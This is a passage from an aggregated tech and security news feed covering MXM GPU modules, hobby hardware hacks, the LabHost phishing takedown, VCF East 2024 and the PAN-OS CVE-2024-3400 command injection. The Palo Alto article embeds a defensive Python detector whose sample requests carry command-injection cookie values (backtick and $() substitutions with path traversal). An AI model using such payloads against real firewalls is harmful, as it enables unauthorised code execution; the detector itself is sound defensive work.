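    print("horizon pixels in a 4096 frame:", round(horizon_pixels(4096)))
```

Points on the fisheye horizon map onto the frame’s main diagonal and the rim of the circle lands exactly on the square’s edge, so no frame pixels are wasted on black corners; the inverse lets a player sample the stored frame back into a fisheye projection for rendering.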

Videos like VR180 videos and Apple’s immersive format display stereoscopic video that allow a user to look around naturally in a scene. But to really deliver a deeper sense of presence and depth takes light fields.




MXM: Powerful, Misused, Hackable
https://poliverso.org/display/0477a01e-5dc850c4-ce56acaa4309b10d

A standard-compliant MXM card installed into a laptop, without heatsink

Today, we’ll look into yet another standard in the embedded space: MXM. It stands for “Mobile PCI Express Module”, and is basically intended as a GPU interface for laptops with PCIe, but there’s way more to it – it can work for any high-power high-throughput PCIe device, with a fair few DisplayPort links if you need them!

You will see MXM sockets in older generations of laptops, barebones desktop PCs, servers, and even automotive computers – certain generations of Tesla cars used to ship with MXM-socketed Nvidia GPUs! Given that GPUs are in vogue today, it pays to know how you can get one in low-profile form-factor and avoid putting a giant desktop GPU inside your device.

I only had a passing knowledge of the MXM standard until a bit ago, but my friend, [WifiCable], has been playing with it for a fair bit now. On a long Discord call, she guided me through all the cool things we should know about the MXM standard, its history, compatibility woes, and hackability potential. I’ve summed all of it up into this article – let’s take a look!

This article has been written based on info that [WifiCable] has given me, and, it’s also certainly not the last one where I interview a hacker and condense their knowledge into a writeup. If you are interested, let’s chat!

Simple Wireup, Generous Payoff

Figure: Yes, an Intel A380m card in MXM format
An MXM card has a whole side dedicated to its gold finger PCB edge connector. With 285 pins, there are a whole lot of interfaces you can get out of these, and all of them are within hobbyist reach! To make an MXM card work, you don’t need much, either.

For an MXM card to work, first, you need to be able to provide between 60 W and 100 W of power, with the ability to impose a power consumption limit on the card. The standard says that the voltage can be anywhere from 7 V to 20 V. This is obviously intended for laptop use, where the main power rail can either be at charger voltage or battery voltage, and it results in high efficiency – you don’t need a separate buck-boost regulator for, say, 12 V.

Then, you need a PCIe link of up to 16x, but because PCIe is cool like that, even a 1x link will work as long as you won’t be sad if the GPU is bottlenecked by it. You also might need to set up a few control GPIOs, like the card enable pin, and the power limit pin that tells the card whether it should run in lower-power mode or not. Plus, for some cards, you might need to give the card 5 V at an amp or two – the standard requires that, but it’s not clear why. Technically, you can even connect an MXM card to a Raspberry Pi 5 or CM4, as long as you can procure enough power from some external source – if you want a low-footprint GPU paired with a Pi, MXM makes that firmly within your reach.

In return, you get a wide array of interfaces. The coolest part is, undoubtedly, DisplayPort: you can get up to six 4-lane DP links out of an MXM card, as long as the GPU chip supports that many. You might also be able to get VGA, LVDS, and even HDMI/DVI. MXM GPUs do support DP++, the dual-mode DisplayPort feature that lets a DP output drive HDMI/DVI-compatible signals, and you only need a few external components for it.

You also get a good few low-level interfaces, for both practical and debug purposes. Need to control a small fan? There's a PWM output you might be able to use for fan control, and a tach signal input! Backlight control for an LCD panel you've wired up? There's a PWM output for that too. Want to poke at the GPU's JTAG? The MXM socket has pins defined for that. It's up to each card whether to support much of what the MXM standard defines, so you might still benefit from a small MCU, but having those signals seriously helps in embedded applications.

Speaking of JTAG and vendor freedom: of course, there are OEM pins. Since anyone can produce MXM GPUs and systems, and the MXM standard has lasted for decades now, manufacturers like to put their own spin on it. You can often figure things out from MXM-equipped laptop schematics, and sometimes it's necessary to check a few. See, giving freedom to individual implementers is a double-edged sword, and MXM is an outstanding illustration of how modular standards can go wrong for regular users.

Compatible, Mostly


Looking at MXM, you might rejoice, thinking about upgrading and repairing your laptop well beyond the few years the warranty covers. However, manufacturers are not exactly interested in that. For them, the incentive structure for using MXM is usually completely different.

For a start, producing a board with five BGAs can in certain cases be easier than producing a board with fifteen, which is what you often end up with if you have to put a GPU and its RAM on your mainboard instead of on an MXM module. And, when offering multiple GPU configurations of the same model so the manufacturer can cover multiple points on the supply-demand chart, it might just be easier to produce an array of MXM cards and pair them with an array of GPU-less mainboards that have their own configurations. Not always – which is part of why you don't see it much lately.
This is not a standard-defined shape for an MXM card.
So, while you might like upgradability and repairability, you might find that MXM GPUs are rarely offered for sale as replacement parts. And, what's worse, if you've found an MXM card made for a different laptop, there's no guarantee it will fit.

For instance, some cards follow the MXM 3.0 standard, while others are MXM 3.1, with slight but important differences, like support for two DP ports on the LVDS pins. However, most real-world differences come either from a lack of standardization or from manufacturers straight-up ignoring the standard.

The first hurdle is the most obvious one: the mechanical footprint. The MXM standard defines two possible card shapes, the A and B types, including things like heatsink and retention screw hole layout, and even component height for heatsink compatibility. Many laptop manufacturers ignore these rules, producing cards of wacky shapes, or worse, shapes that almost match but are incompatible in a subtle but severe way.

Then, there are the VBIOS and driver problems. Many MXM cards have an onboard BIOS chip, whereas other cards rely on the laptop's firmware to feed them their VBIOS during boot. If your card is of the latter type, you might need to add a UEFI module or hack the firmware code. Alternatively, some cards ship with unpopulated flash chip footprints or unflashed chips, so you can give your card a BIOS with a bit of soldering and flashing, as long as you can find an image that works.

As for drivers, Nvidia stands out. Many Windows Nvidia drivers for MXM cards check the laptop's hardware IDs and refuse to install if the card sits in a laptop it was not expected to be installed in. You used to be able to work around that by editing the driver's INF file, but nowadays driver signing severely limits what you can do: the edit invalidates the driver's signature, and Windows has no sane leeway for user-tweaked drivers, so signing ends up working as effective proprietary vendor lock-in. So, if you want to upgrade your Nvidia MXM card and you run Windows, you might run into a bit of a brick wall.

Some Outright Hostile


Continuing this line of reasoning: there are slots that look like MXM but aren't MXM, and I'm not talking about SMARC, a fun SoM standard that reuses the MXM connector, just like Pi Compute Modules reuse DDR sockets. No, I'm talking about manufacturers like Lenovo, who have added MXM-socketed GPUs to some of their more recent laptops, but with completely different pinouts. At least they don't advertise those slots as MXM, which is a bonus.
Where are the power pins? Who knows!
Still, these cards are easy to confuse with actual MXM, and they fit into the slot all the same. The fieriest factor is the power pin layout – a mind-boggling change made on some laptop models that can destroy both your card and your laptop even if the card fits mechanically. On one side of an MXM card, there's an array of power pins – a matching number of VIN and GND, often visible as a single large gold finger. For some unimaginable reason, a few manufacturers have made cards that remap the entire pinout and specifically put those power pins on the opposite side.

The pinout swapping is bad enough, but it's the power pin swapping that really gets us, and gets every piece of tech involved to release the magic smoke, too. And then there are the few outright criminal cases where manufacturers have put power pins on both sides of the pinout. You can easily notice this when you look at your card, but you have to know to look out for it.

The MXM standard can't prevent most of these problems, and whatever it does try to limit, laptop manufacturers can freely bypass. There's no certification or compliance checking; fundamentally, in laptops, MXM isn't used for your convenience – it's used for the manufacturer's. If you look at your old MXM-equipped laptop and think you might be able to upgrade its GPU, remember that there's more than meets the eye.

None of this means you can't hack on MXM otherwise. Just remember that whatever you build might be specific to a certain breed of MXM slots in certain laptop lineups rather than to MXM as a standard.

Still Hackable Anyway


How about a few good MXM hacks to show you what you can do? Remember, fundamentally, MXM is a high-power connection carrying a high-bandwidth PCIe link, which lets you pull some wonderful tricks!

For instance, here's an MXM adapter for certain kinds of iMacs that lets you install an NVMe SSD into the MXM slot of your trusty iMac while preserving the MXM GPU connections. It involves changing a chipset strap to enable bifurcation, so there's no power-hungry PCIe switch involved, and going from x16 to x8 on your MXM GPU won't cost you any notable real-world performance either. So, you can replace your SATA HDD or SSD with a speedy modern NVMe drive that is probably way cheaper, too!

In general, it wouldn't be hard to make a generic MXM to NVMe adapter – and [WifiCable] has a template KiCad project for you. Just like mPCIe and M.2 cards, an MXM card is a PCB, after all, 1.2 mm thick. You might be worried about leaving your laptop GPU-less, but many laptops with MXM cards still have an iGPU that gets enabled whenever the MXM card is removed, though that's not a guarantee. We might see an MXM to OCuLink adapter too, at some point!

There are also a few adapters for reusing MXM cards on the market, cheap and expensive alike. That kind of adapter is good for checking any MXM cards you have lying around, and on the cheap ones, you might even be able to solder the extra HDMI port on, as long as you get 5 V from somewhere. Sadly, none of them are open-source – yet.


This is an MXM tinkering adapter board from [WifiCable], exposing as much of MXM as humanly possible, with a wide range of power input options. Every option is on either pin headers or SMD resistors, able to satisfy whichever obscure feature an MXM card might need, and to tap interfaces that manufacturers don't expect you to tap. It's a decently complex design, still to be polished, and it's a 6-layer board big enough to go past a good few price breaks at any PCB fab – we've both learned a ton about high-speed design as [WifiCable] went about it. However, when it comes to playing with different MXM cards, exploring manufacturer differences and tinkering with card compatibility, this is as good a testbench board as anyone can build!

Want to build your own MXM stuff, whether cards or card-carrying PCBs? Here’s a socket on LCSC, and with easyeda2kicad, you can easily get a footprint and 3D model for it. As for designing your own card or getting the [generic] pinout, you can find the MXM standard by looking up MXM_Specification_v31_r10.pdf.

Gone But Not Forgotten

DGFF card
Sadly, with the trend of making laptops thinner, we've been losing MXM, and the companies involved in defining the standard have not been all that interested in updating it, or even adhering to it, for that matter. Nevertheless, thanks to industrial use of MXM, you can still find many modern GPUs in MXM format!

Furthermore, the spirit of MXM lives on. The proprietary DGFF standard is superseding MXM in Dell laptops – it's thinner, but it's fundamentally the same functionality MXM provides. The same goes for the Framework 16 expansion bay modules – you could easily make an MXM to expansion bay card, and [WifiCable] has made a KiCad sketch of one too!

For now, we still have laptops with MXM and almost-MXM cards around, and if you ever look into tinkering with those, you now have a better roadmap towards that. Despite the prevalence of soldered-on GPUs in laptops, the concept of GPU modules isn’t about to die out, and companies still put “GPU module” on the whiteboards every now and then during their product design processes.


The Privacy Post reshared this.


LYFT: Standing Up for Better IKEA BEKANT Control
https://poliverso.org/display/0477a01e-3ce0e3a1-5edf3d5e58735f99

IKEA BEKANT sit/stand desk with a new controller attached

The IKEA BEKANT sit/stand desk is kind of a lifesaver — even if you don’t personally go between sit and stand much, the adjustability makes sharing the desk a breeze. Sharing was the case in [Matthias]’ house during the pandemic, as he and his wife took turns using the desk. Switching between their two preferred heights quickly became annoying, so [Matthias] engineered LYFT, a replacement controller that stores up to four settings.

In addition, the new SAMD21-based controller allows them to raise and lower the desk without having to hold the button down. And finally, having a digital readout showing the position is just plain cool. As you’ll see in the manual (PDF), LYFT is as easy to set up and use as the average flat-packed product.

In order to make this work, [Matthias] had to figure out how the desk’s motors communicate out of the box, and he did so with the help of a BEKANT controller project by [Greg Cormier]. You won’t find LYFT at the blue and yellow, at least not yet; for now, you’ll have to shop Tindie or build it yourself.


The Palo Alto Command Injection Exploit Is Online. Disabling Telemetry Is No Longer Effective
https://poliverso.org/display/0477a01e-4aa89920-4321567756e34390

An exploit has appeared online for the critical vulnerability CVE-2024-3400 (10 points on the CVSS scale). It affects Palo Alto Networks firewalls running PAN-OS. The bug is already under active exploitation, allowing unauthenticated attackers to execute arbitrary code with root privileges.

Recall that CVE-2024-3400 became known at the beginning of this month. According to the vendor, all devices running PAN-OS 10.2, 11.0 and 11.1 with the GlobalProtect gateway and telemetry enabled were vulnerable to the bug. Other PAN-OS versions, cloud firewalls and Prisma Access devices are not affected.

Although Palo Alto Networks has already begun releasing patches for its firewalls, the vulnerability has been exploited by attackers since 26 March 2024, when it was used to plant a backdoor with the Upstyle malware. A group tracked as UTA0218 has been associated with this activity.

According to Shadowserver, more than 156,000 PAN-OS firewalls are found exposed on the Internet every day, although it is not known how many of them are vulnerable. According to security researcher Yutaka Sejiyama, around 82,000 firewalls are vulnerable to CVE-2024-3400 attacks, and about 40% of them are in the United States.

Just one day after Palo Alto Networks began releasing hotfixes for CVE-2024-3400, researchers at WatchTowr Labs published a detailed analysis of the vulnerability and a PoC exploit that can be used to run shell commands on unpatched firewalls.

“We inject the command injection payload into the value of the SESSID cookie, which (assuming GlobalProtect and telemetry are enabled on the Palo Alto device) is then concatenated into a string and finally executed as a shell command,” WatchTowr Labs said.

To make matters worse, Palo Alto Networks updated its advisory yesterday and warned that the previously described mitigations were ineffective.

“Earlier versions of this post listed disabling device telemetry as a secondary mitigation. Disabling device telemetry is no longer an effective mitigation. Device telemetry does not need to be enabled for firewalls running PAN-OS to be vulnerable to attacks related to this vulnerability,” reads Palo Alto Networks' updated advisory.
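The WatchTowr description above gives defenders one concrete handle: the payload travels in the SESSID cookie value, which the firewall pastes into a shell command, so a request-level check can flag cookie values that carry path traversal or shell metacharacters. What follows is an added illustration of that check, not the PoC and not code from Palo Alto Networks or WatchTowr Labs. The sample requests, the endpoint paths and hostnames in them, and the "benign session ID" pattern are constructed assumptions; the result is a triage signal for logs or a WAF, not a substitute for the vendor patch.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample requests (not real captures). Endpoint paths and hosts are
# placeholders; only the Cookie header matters for this check.
SAMPLE_REQUESTS = [
    # 0. Ordinary session cookie: should not be flagged.
    "POST /example/endpoint HTTP/1.1\r\nHost: vpn.example.test\r\n"
    "Cookie: SESSID=abc123def456; other=1\r\n\r\n",
    # 1. Path traversal plus a backtick command substitution in the cookie value.
    "POST /example/endpoint HTTP/1.1\r\nHost: vpn.example.test\r\n"
    "Cookie: SESSID=/../../../tmp/`id`\r\n\r\n",
    # 2. Same idea, URL-encoded to slip past naive string matching.
    "POST /example/endpoint HTTP/1.1\r\nHost: vpn.example.test\r\n"
    "Cookie: SESSID=%2F..%2F..%2Ftmp%2F%24%28id%29\r\n\r\n",
    # 3. No SESSID cookie at all.
    "GET /example/login HTTP/1.1\r\nHost: vpn.example.test\r\n\r\n",
    # 4. Not obviously malicious, but not a well-formed session ID either.
    "POST /example/endpoint HTTP/1.1\r\nHost: vpn.example.test\r\n"
    "Cookie: SESSID=abc!def\r\n\r\n",
]

# Characters that let a value break out of a shell command it is pasted into.
SHELL_META = re.compile(r"[`$;|&<>\n\r]")
# ".." as a path component: steers a file write out of its intended directory.
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
# Assumed shape of a benign session identifier (an assumption for this example,
# not the vendor's documented format).
SAFE_SESSID = re.compile(r"[A-Za-z0-9_\-]{8,128}")


def extract_sessid(raw_request: str) -> Optional[str]:
    """Return the raw SESSID cookie value from an HTTP request, or None."""
    for line in raw_request.split("\r\n"):
        if line.lower().startswith("cookie:"):
            for part in line[len("cookie:"):].split(";"):
                name, _, value = part.strip().partition("=")
                if name == "SESSID":
                    return value
    return None


def classify_sessid(value: Optional[str]) -> List[str]:
    """Return findings for a SESSID value; an empty list means nothing suspicious."""
    if value is None:
        return []
    decoded = unquote(value)  # inspect the decoded form so %2F.. is caught too
    if SAFE_SESSID.fullmatch(decoded):
        return []
    findings: List[str] = []
    if TRAVERSAL.search(decoded):
        findings.append("path-traversal")
    if SHELL_META.search(decoded):
        findings.append("shell-metachar")
    if not findings:
        findings.append("unexpected-charset")
    return findings


def scan_requests(requests: List[str]) -> List[Dict[str, object]]:
    """Return one record per request whose SESSID cookie produced findings."""
    hits: List[Dict[str, object]] = []
    for index, raw in enumerate(requests):
        value = extract_sessid(raw)
        findings = classify_sessid(value)
        if findings:
            hits.append({"index": index, "sessid": value, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(f"request {hit['index']}: SESSID={hit['sessid']!r} -> {', '.join(hit['findings'])}")
```

Decoding before matching is the part that matters: the first two malicious samples differ only in URL encoding, and a check on the raw bytes would miss the second one. Anything the allow-list does not match is reported, so the "unexpected-charset" bucket will also surface benign oddities; tune the pattern to what your own gateway actually issues.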

The article “The Palo Alto Command Injection Exploit Is Online. Disabling Telemetry Is No Longer Effective” originally appeared on il blog della sicurezza informatica.


Europol Blows Up LabHost: A Worldwide Phishing Platform Taken Down
https://poliverso.org/display/0477a01e-2916db9e-e33ef782f91d168d

This week, law enforcement from 19 countries severely disrupted one of the world's largest phishing-as-a-service platforms, known as LabHost. The year-long operation, coordinated internationally by Europol, led to the compromise of LabHost's infrastructure.

Between Sunday 14 April and Wednesday 17 April, a total of 70 addresses were searched worldwide, leading to the arrest of 37 suspects. This includes the arrest of four people in the United Kingdom linked to running the site, among them the service's original developer. The LabHost platform, previously available on the clear web, has now been shut down.

This international investigation was led by the UK's Metropolitan Police, with the support of Europol's European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT) hosted at its headquarters. During the action phase, a Europol specialist supported the Dutch National Police in its enforcement actions.

Commercialising phishing attacks


Cybercrime-as-a-service has become a fast-growing business model in the criminal landscape, in which threat actors rent or sell tools, expertise or services to other cybercriminals so they can carry out their attacks. While this model is well established among ransomware groups, it has also been adopted in other areas of cybercrime, such as phishing.

LabHost had become a major tool for cybercriminals worldwide. For a monthly subscription, the platform provided phishing kits, infrastructure for hosting pages, interactive functionality for engaging directly with victims, and campaign overview services. The investigation uncovered at least 40,000 phishing domains linked to LabHost, which had around 10,000 users worldwide.

With an average monthly fee of $249, LabHost offered a range of illicit services that could be customised and deployed in a few clicks. Depending on the subscription, criminals were offered an increasing range of targets, including financial institutions, postal delivery services and telecommunications providers. LabHost offered a menu of over 170 fake websites providing convincing phishing pages for its users to choose from.

What made LabHost particularly destructive was its integrated campaign management tool, called LabRat. This feature allowed cybercriminals to monitor and control attacks in real time. LabRat was designed to capture two-factor authentication codes and credentials, allowing criminals to bypass enhanced security measures.

Easily accessible, but still a crime


Platforms like LabHost make cybercrime more easily accessible to inexperienced hackers, significantly widening the pool of threat actors. However, user-friendly as the service may appear, its malicious use is an illegal activity and the penalties can be severe.

A large amount of data gathered during the investigation is now in the hands of law enforcement. This data will be used to support ongoing international operational activities focused on targeting the malicious users of this phishing platform.

The following authorities took part in the investigation:

  • Australia: Joint Cybercrime Coordination Centre, led by the Australian Federal Police;
  • Austria: Criminal Intelligence Service (Bundeskriminalamt);
  • Belgium: Federal Judicial Police of Brussels (Police judiciaire fédérale Bruxelles / Federale gerechtelijke politie Brussel);
  • Finland: National Police (Poliisi);
  • Ireland: An Garda Síochána;
  • Netherlands: Central Netherlands Police (Politie Midden-Nederland);
  • New Zealand: New Zealand Police;
  • Lithuania: Lithuanian Police;
  • Malta: Malta Police Force (Il-Korp tal-Pulizija ta’ Malta);
  • Poland: Central Cybercrime Bureau (Centralne Biuro Zwalczania Cyberprzestępczości);
  • Portugal: Judicial Police (Polícia Judiciária);
  • Romania: Romanian Police (Poliția Română);
  • Spain: National Police (Policía Nacional);
  • Sweden: Swedish Police Authority (Polisen);
  • United Kingdom: Metropolitan Police Service;
  • United States: United States Secret Service (USSS) and Federal Bureau of Investigation (FBI);
  • Czech Republic: Criminal Police and Investigation Service;
  • Estonia: Estonian Police and Border Guard Board;
  • Canada: Royal Canadian Mounted Police.

The article “Europol Blows Up LabHost: A Worldwide Phishing Platform Taken Down” originally appeared on il blog della sicurezza informatica.


Hacked Oscilloscope Plays Breakout, Hints at More
https://poliverso.org/display/0477a01e-a4369873-de12095a735cd022


You know things are getting real when the Dremel is one of the first tools you turn to after unboxing your new oscilloscope. But when your goal is to hack the scope to play Breakout (https://github.com/davidgiven/dso152-breakout), sometimes plastic needs to be sacrificed.

Granted, the scope in question, a Fnirsi DSO152, only cost [David Given] from Poking Technology a couple of bucks. And while the little instrument really isn’t that bad inside, it’s limited to a single channel and 200 kHz of bandwidth, so it’s not exactly lab quality. The big attractions for [David] were the CH32F103 microcontroller and the prominent debug port inside, not to mention the large color LCD panel.

[David]’s attack began with the debug port and case mods to allow access, but quickly ground to a halt when he accidentally erased the original firmware. But no matter: tracing out the pins is always an option. [David] made that easier by overlaying large photos of both sides of the board, which let him figure out which buttons went to which pins and map out the display’s parallel interface. He didn’t mess with any of the analog stuff except to create a quick “Hello, oscilloscope!” program that outputs a square wave on the calibration pin. He did, however, write a display driver and port a game of Breakout to the scope; the video is below.

We’ve been seeing a lot of buzz around the CH32xx MCUs lately; seeing it start to show up in retail products is perhaps a leading indicator of where the cheap RISC chips are headed. We’ve seen a few interesting hacks with them, but we’ve also heard tell they can be hard to come by. Maybe getting one of these scopes to tear apart can fix that, though.

https://www.youtube.com/embed/VYZcPrOuGKg?feature=oembed

Thanks to [Bike Forever] for the heads up on this one.


Two New Apple and Google Platform Privacy Requirements Kicking In Now
https://fpf.org/blog/two-new-apple-and-google-platform-privacy-requirements-kicking-in-now/
@privacy
Apple’s important mandatory requirements affecting iOS apps are about to kick in, and Google’s new requirements for publishers and advertisers have just gone into effect. Accurately implementing these requirements calls for close cooperation between the legal, privacy, and ad ops teams. Apple’s Privacy Manifests At

In the latest #EDRigram, we draw your attention to:

🇬🇷 Record-high #GDPR fine for Greece's Migration Ministry
🇪🇺 @europarl_en vote in favour of discriminatory #MigrationPack
💰Meta's harmful push to charge for privacy
& more!

Read up & share: https://edri.org/our-work/edri-gram-17-april-2024/


💡 #FreeSoftware licences are helpful for many, many reasons. For example, they enable independent developers to use or reuse existing software, and implement it in their projects! 😍

‼️ The :fsfe: #FSFE has developed #REUSE, both a tool and a specification to make Free Software licensing easy for humans and machines alike. 💕

ℹ️ https://reuse.software

Source Code to the 1999 FPS Game Descent 3 Released
https://poliverso.org/display/0477a01e-946b71be-4215280fb7f640e0


On April 16th of this year, [Kevin Bentley] released the source code (https://github.com/kevinbentley/Descent3) to the sci-fi FPS game Descent 3 (https://en.wikipedia.org/wiki/Descent_3?useskin=vector). Originally released in 1999 for Windows, it was the third part in the Descent series, following right after the events of Descent 2. In the game, you control a flying ship that you have to guide through both indoor and outdoor environments, shooting at robots infected with an alien virus as you try to save the solar system. It was later also ported to Mac OS and Linux, but was considered a commercial flop due to low sales.

As one of the original developers, [Kevin] explains that one of the goals of this code release is to give the game a second life, by cleaning up the C++ code and using new APIs. Original proprietary audio and video libraries from Interplay were removed, which means that some work is required before one can build a fresh copy of new Descent 3 from this code base. That said, the released code is the latest 1.5 patch level, with the Mac OS and Linux support. Even if the original Descent games weren’t your cup of tea, it’s still great to see games being preserved and updated like this.

Thanks to [Phil Ashby] for the tip.


FLOSS Weekly Episode 779: Errata Prevention Specialist
https://poliverso.org/display/0477a01e-fdd422e1-dc42b75e01d1b0d6


This week Jonathan Bennett and Dan Lynch (https://mastodon.social/@methoddan) sit down with Andy Stewart to talk about Andy’s Ham Radio Linux (AHRL, https://sourceforge.net/projects/kb1oiq-andysham/)! It’s the Linux distro designed to give hams the tools they need to work with their radios. What’s it like to run a niche Linux distro? How has Andy managed to keep it up for over a decade? And what’s the big announcement about the project breaking today?


Did you know you can watch the live recording of the show right in the Hackaday Discord? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Next week we’re taping the show on Tuesday, and we're looking for a guest!

https://play.libsyn.com/embed/episode/id/30874658/height/192/theme/modern/size/large/thumbnail/yes/custom-color/fcab1c/time-start/00:00:00/hide-playlist/yes/download/yes/font-color/271b04

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


This Go-Kart Rides on a Pallet
https://poliverso.org/display/0477a01e-df2163d3-2022d98fd8201579


Many beginner woodworkers, looking to offset the introductory costs of starting a hobby, will source their wood from pallets. Generally they’re easily found and can be low or no cost, but typically require a bit of work before they’re usable in a project. [Garage Avenger] is looking to do something a little outside of the box with his pallet project, though. He’s using raw pallets as a chassis for a four-speed go-kart, partially for the challenge and excitement and also to one-up a Pinterest post.

Almost immediately, though, the other major downside of working with pallets arose: they’re generally built out of low-grade pine, which is soft and flexible. Flexibility is not a good thing to have in a vehicle frame, so plenty of the important parts of this build were strengthened with steel tubing, including the rear axle, steering mounts, and a few longitudinal supports to stiffen the overall frame. After working out some kinks with ordering a few of the wrong parts and mounting the steering box backwards, it was time to test out the four-speed engine (and brakes) on the go-kart, making it nearly ready for the road.

To complete the build, some tidying of wiring and fuel lines was done, along with improving some of the non-critical parts of the build like the bucket seat. Of course, adding pallet spoilers and body kit puts the finishing touches on the build and the go-kart is finally ready to tear up the local go-kart track and the less-inspiring Pinterest projects. [Garage Avenger] is no stranger to strange vehicle builds, either. Although it’s a bit out of season for most of our northern hemisphere readers now, his jet-powered street sled is still worth a view.

https://www.youtube.com/embed/b3XqcfVq5bE?feature=oembed


Compiling and Running Turbo Pascal in the Browser
https://poliverso.org/display/0477a01e-bdf87362-b4f5d1183d700f59


When a friend of [Lawrence Kesteloot] found a stack of 3.5″ floppy disks, they turned out to contain Turbo Pascal code the two of them had worked on back in the summer of 1989. Amidst reminiscing about the high school days and watching movies on VHS, [Lawrence] sought a way to bring these graphical applications back to life (https://www.teamten.com/lawrence/projects/turbo_pascal_compiler/). Not finding an easy way to compile Turbo Pascal code on a Mac, even back in 2013 when he started the project, he ended up writing a Turbo Pascal compiler in JavaScript, as any reasonable person would do in this situation.
SPIDER.PAS in its full glory. (Credit: Lawrence Kesteloot)
As noted by [Lawrence], the compiler doesn’t implement the full Turbo Pascal 5.5 language, but only the subset that was required to compile and run these applications which they had found on the floppy disks. These include ROSE.PAS and SPIDER.PAS along with three others, and can also be found in the GitHub repository. As can be seen in the online version of the compiler, it captures the feel of programming Pascal in 1989 on the command line.

Naturally, the software situation has changed somewhat over the last decade. We’ve recently seen some promising multi-platform Pascal compilers, and of course you could even run Turbo Pascal in DOSBox or similar. That might make this project seem irrelevant, but being able to write and run Pascal applications in more ways and on more platforms is never a bad thing.




VCF East 2024 Was Bigger and Better Than Ever
https://poliverso.org/display/0477a01e-1b1a21cc-fbef3d7b242b0e4f
https://vcfed.org/events/vintage-computer-festival-east/

I knew something had changed before I even paid for my ticket to this year’s Vintage Computer Festival East at the InfoAge Science and History Museum in Wall, New Jersey.

Over the last couple of years, attendance has been growing to the point that parking in the lot directly next to the main entrance has been reserved for only the earliest of risers. That hasn’t described yours truly since the days when I still had what my wife refers to as a “real job”, so that’s meant parking in the overflow lot down the road and walking the half a mile or so back to the main gate. Penance for working on the Internet, let’s call it.

But this time, while walking along the fence that surrounds the sprawling InfoAge campus, I came across an open gate and a volunteer selling tickets. When commenting to her that this was a pleasant surprise compared to the march I’d anticipated, she responded that there had been so many people trying to get into the main entrance that morning that they decided to station her out here to handle the overflow.

I was a few steps past her table and into InfoAge before the implications of this interaction really hit me. Two entrances. How many attendees does there need to be before you set up a secondary ticket booth out by the reserve parking lot just to keep things moving smoothly? Well, I can’t tell you what the exact number is. But after spending the rest of the day walking between all the buildings it took to contain all of the exhibits, talks, and activities this year, I can tell you it’s however many people came to VCF East 2024.

Compared to its relatively humble beginnings, it’s incredible to see what this event has grown into. InfoAge was packed to the rafters, and despite what you might think about a festival celebrating decades-old computing hardware, there were plenty of young faces in the crowd. I’m not sure exactly what’s changed, but the whole place was positively jumping. Perhaps it’s partially the generational nostalgia that’s kept Netflix cranking out new seasons of the 1980s-set Stranger Things. I’m sure attention (and attendance) from several well-known YouTube personalities has played a big part as well.

Whatever the magic formula that’s turned what was once a somewhat somber retrospective on early desktop computers into a major destination for tech lovers, I’m all for it. Long Live the Vintage Computer Festival!

A Few of My Favorite Things


I’ve only rarely been confused with Julie Andrews, but I’ll do my best here to catalog some of my personal highlights from VCF East 2024.

This is in no way meant to be a comprehensive view of what was on hand over the weekend. I can’t stress enough how absolutely impossible of a task it would be to accurately record everything that was on display — and that’s not including the talks and classes that were happening at the same time. If you’re even remotely interested in vintage computing or rare and unusual tech, this is an event you absolutely need to see for yourself to truly appreciate.

COSMAC Elves on the Shelves


First described in a series of Popular Electronics articles in the back-half of the 1970s, the Elf was a simple homebrew computer based on the RCA 1802 Complementary Symmetry Monolithic Array Computer (COSMAC) chip. In the boilerplate configuration, it used a pair of LED hexadecimal displays for output and eight toggle switches for input. There was no ROM — programs were entered directly into memory using the toggle switches as God intended.

Different kit versions of the computer were sold over the years, and the community has produced countless spin-offs of the basic concept right up to the present day. For their exhibit RCA COSMAC 1802 Computers, Josh Bensadon and Walter Miraglia had a wide collection of these DIY machines on display, as well as a few commercial devices that used the 1802 such as the RCA Studio II.

Modern Art on Vintage Hardware


Although there’s a canvas print of one of Joe Kim’s pieces on the wall in my office, I wouldn’t say that I’m much of an art guy. But there was something about The Plot Thickens: Pen Plotter History and Artistry that I found fascinating. Paul Rickard was demonstrating how he uses modern Python code to generate algorithmic art which he then puts on paper with vintage plotters — machines he lovingly refers to on his website as “absurd and inefficient” in all the right ways.

Crank-Loaded Software


As the name implies, the exhibit 80’s Luggables was intended to show off various mobile computers from the pre-laptop days, such as the Osborne Executive. But honestly, I thought the inclusion of an Altair 8800 and Macintosh SE muddied the waters a bit. Granted, the Mac, with its handle and integrated display, might be on the borderline. But the Altair? If that’s portable, then pretty much every other computer ever made must be as well.

That being said, the Altair ended up being perhaps the most interesting piece of the exhibit, as it was fitted with a modern crank-operated paper tape reader. Attendees were able to toggle in the appropriate settings for the Altair’s Multi-Boot Loader (MBL) PROM, crank the tape through the reader, and then enjoy the fruits of their labor by playing the loaded game through the Osborne Executive that was acting as a serial terminal.
It was the sort of hands-on interaction with vintage hardware that you really only get to experience at an event like VCF, and many attendees walked away from their first experience loading software from paper tape with a much greater appreciation for the modern USB flash drive.

Towers of Power


TRS-80 Model II Boards Collection was a simple exhibit, but it certainly caught the eye. Pete Cetinski took 28 different expansion boards (apparently a near-complete set) for Tandy’s classic machine, mounted each one next to a typed-up description of what it does, and had them out for display. There was also a Model 16 with the lid off so attendees could better visualize how these boards would have been installed.

The Internet As it Once Was


As somebody who fights, er, works with modern web technology on a daily basis, The Serial Port by Ben Grubbs definitely hit on a personal level. This exhibit was really in two parts: one half was showing off a Cobalt RaQ web server appliance from the 1990s, but a few steps away there was a desktop running an era-appropriate version of Microsoft FrontPage that let you bang out a simple web page that would be served up from the RaQ.
This gave attendees a chance to experience what it was like on both sides of the fence back in the days when we thought flashing marquees were a neat idea. Another excellent interactive setup that was getting a lot of attention, especially from some of the younger folks who may not have even been alive when such simplistic sites ruled the net.

The Tip of a Vintage Iceberg


As I said before, there’s simply no way to do an event like Vintage Computer Festival East justice with a post like this. The exhibits took up four separate rooms spread out among multiple buildings, and the consignment area was even larger and more popular than last year.

Instead, consider this post something of a barometer for VCF, and perhaps for the larger vintage computing community as a whole. If you had any concerns about this particular technological niche fading away into obscurity, I can tell you from first-hand experience that not only is it alive and well, but it’s growing into something truly remarkable.




